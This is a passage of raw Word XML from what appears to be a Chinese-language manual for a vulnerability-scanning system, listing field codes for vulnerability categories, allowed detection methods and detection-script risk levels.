            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21A0C4A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FA42483" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F244C07" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A94C127" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77C2B8AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0433B7F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>SQL注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="03ED316B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E857A37" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21AE695F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B0D2FBD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>未授权访问</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1B737CD4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D8D7B7C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77C724ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DE092FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>敏感信息泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="431AF1EF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38889C18" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BD91EB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="037BE55E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>XML外部实体注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="67529463" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BC02CCC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1683792F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CCCC947" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>跨站脚本</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="25678569" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="661393DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="181CC029" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="220498D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>不安全的反序列</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1D7A5A65" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F75CDD0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35654EAC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A87F979" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>客户端请求伪造</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5656ADA8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79EA9A72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38340BBD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FB3231C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>服务端请求伪造</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4E6FF50F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5650E09E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77C5FE63" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01BD18E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>命令执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3DD6F0BC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38191652" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="357A186A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28075F12" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>代码执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="41BFCDF8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79DE22CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59EA0FC0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="036B2D91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任意文件上传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7293251D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="764D8911" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1790598C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17C819D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任意文件读取</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="248B0572" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1203C099" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35007930" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E35E47A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>拒绝服务攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5BE9B4B9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="045CBA43" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="746259A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C1565A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>目录遍历</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="73671F89" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FC6FD31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FEC0E6C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DF24C55" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>恶意后门</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0BB2343D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5631AF9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B2B537B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="582E8507" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>本地提权</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="17F89E36" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E8AC1B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C360369" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F2DB7FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>注入漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37DA38BD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="573" w:name="_Toc115166359"/>
      <w:bookmarkStart w:id="574" w:name="漏洞允许的检测方式"/>
      <w:bookmarkEnd w:id="572"/>
      <w:r>
        <w:t>漏洞允许的检测方式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="573"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2124"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1047"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="164CDAE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9BF6A33" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F5A0191" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AFAE5C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="560B73E5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D77B0AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>permitExecuteTypes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13C1E359" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="103B8289" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>版本对比</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="33EC3B7E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="106A05E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>permitExecuteTypes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E70AC4E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="538F1A2E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>POC检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08B31004" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="575" w:name="_Toc115166360"/>
      <w:bookmarkStart w:id="576" w:name="漏洞检测脚本执行风险"/>
      <w:bookmarkEnd w:id="574"/>
      <w:r>
        <w:t>漏洞检测脚本执行风险</w:t>
      </w:r>
      <w:bookmarkEnd w:id="575"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1708"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="807"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="79D49BE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587A289E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="617513F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="638B80AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0BB8A8B3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C6CEC90" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>executeSeverity</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29BC4AD2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="378F3388" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="03735C4F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="462C88A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>executeSeverity</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="358386A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11D069B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>低风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="664AFCFC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BA8EE3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>executeSeverity</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
